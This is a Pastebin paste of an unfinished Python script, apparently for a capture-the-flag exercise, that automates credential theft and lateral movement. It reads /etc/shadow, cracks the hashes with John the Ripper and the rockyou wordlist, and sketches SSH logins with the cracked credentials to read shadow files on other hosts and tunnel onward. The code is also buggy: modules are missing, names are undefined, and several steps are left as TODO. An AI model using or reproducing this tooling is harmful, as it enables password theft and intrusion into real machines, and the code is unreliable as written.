Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os
- import subprocess
- import sys
- import threading
- import queue
- import paramiko
- if sys.version_info < (3, 0):
- print("Must be run with python3")
- exit()
- ##### Globals
- COMPUTER = {}
- IP = {}
- CRED = []
- CRACKABLE = []
- Computer_Number = 0
- FLAG_FOUND = False
- Q = queue.Queue()
- COMPUTER[0] = {"reachable":[],
- "reached":[],
- "access":None,
- "credentials":None,
- "root":False
- }
- ##### Helpers
- class john(threading.Thread):
- def __init__(self):
- threading.Thread.__init__(self)
- global CRACKABLE
- global CRED
- def timeout(self):
- self.running = False
- def run(self):
- self.running = True
- while self.running:
- if len(CRACKABLE) != 0:
- file = CRACKABLE.pop()
- rip = subprocess.Popen(["john", "--wordlist=~/rockyou.txt", "--pot=./john.pot"], stdout=subprocess.PIPE)
- if rip.poll() == 0:
- (output, err) = subprocess.Popen(["john", "shadows/"+file, "--show", "--pot=./john.pot"], stdout=subprocess.PIPE).communicate()
- else:
- print("Error cracking %s" % file)
- time.sleep(.25)
- class cred(threading.Thread):
- def __init__(self):
- threading.Thread.__init__(self)
- global CRACKABLE
- global CRED
- def timeout(self):
- self.running = False
- def run(self):
- self.running = True
- num_creds = 0
- while self.running:
- if len(cred) == num_creds:
- time.sleep(.25)
- continue
- num_creds = len(cred)
- for Comp_Num in Computer.keys():
- if Computer[Comp_Num]["root"] == False and Computer[Comp_Num]["access"] != None:
- ssh_client =paramiko.SSHClient()
- ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- for username, password in Credentials:
- try:
- print("TODO")
- # ssh_client.connect(hostname=,username=username,password=password)
- # stdin,stdout,stderr=ssh_client.exec_command("cat /etc/shadow")
- # if stderr.readlines() == []:
- # Computer[Comp_Num]["root"] = True
- # load_shadow(stdin.read())
- # break
- except Exception as e:
- print(e)
- def load_servers(fileContent):
- try:
- servers = []
- for line in fileContent.split("\n"):
- try:
- ip, port = line.split(":")
- servers.append([ip, port])
- except:
- pass
- return servers
- except Exception as e:
- print("Error parsing servers.txt:" + str(e))
- def load_shadow(fileContent):
- load_shadow.filenumber
- try:
- with open('shadows/%d' % load_shadow.filenumber,'w+') as file:
- file.write(fileContent)
- CRACKABLE.append(load_shadow.filenumber)
- COMPUTER[0]["root"] = True
- except Exception as e:
- print("Error writing to directory: "+str(e))
- load_shadow.filenumber += 1
- load_shadow.filenumber = 0
- # p = subprocess.Popen(["john", "--wordlist=~/rockyou.txt", "--pot=./john.pot"], stdout=subprocess.PIPE)
- ##### Start Main
- try:
- os.mkdir("shadows")
- except:
- pass
- #Get ips of host
- try:
- (output, err) = subprocess.Popen(["hostname --all-ip-addresses || hostname -I"], stdout=subprocess.PIPE, shell=True).communicate()
- for ip in output[:-2].decode('utf-8').split(" "):
- IP[ip] = 0
- except Exception as e:
- print("Error determining ip address: "+str(e))
- # ~/servers.txt
- with open("servers.txt") as file:
- COMPUTER[0]["reachable"] = load_servers(file.read())
- Q.put(0)
- # Attempt to read etc/shadow
- try:
- with open('/etc/shadow') as file:
- load_shadow(file.read())
- COMPUTER[0]["root"] == True
- except exception as e:
- print(e)
- pass
- print("Actually handle this case")
- try:
- with open('/flag.txt') as file:
- print("found flag")
- except:
- pass
- John_Thread = john()
- Cred_Thread = cred()
- John_Thread.start()
- Cred_Thread.start()
- Tunn_Threads = []
- # while Q.qsize() != 0:
- # Computer = Computers(Q.pop())
- # for ip, port in Computer["reachable"]:
- # if ip in Computer["reached"]:
- # continue
- # for username, password in Credentials:
- # # Attempt log ins
- # Print("TODO")
- # # Create tunnel
- # if(len(Computer["reached"]) != len(Computer["reachable"])):
- # Q.put(Computer)
- # time.sleep(.25)
- while len(CRED) == 0:
- time.sleep(.25)
- John_Thread.timeout()
- Cred_Thread.timeout()
- for T in Tunn_Threads:
- print("TODO")
- John_Thread.join()
- Cred_Thread.join()
- for T in Tunn_Threads:
- T.join()
- print(COMPUTER)
- print(IP)
- print(CRED)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement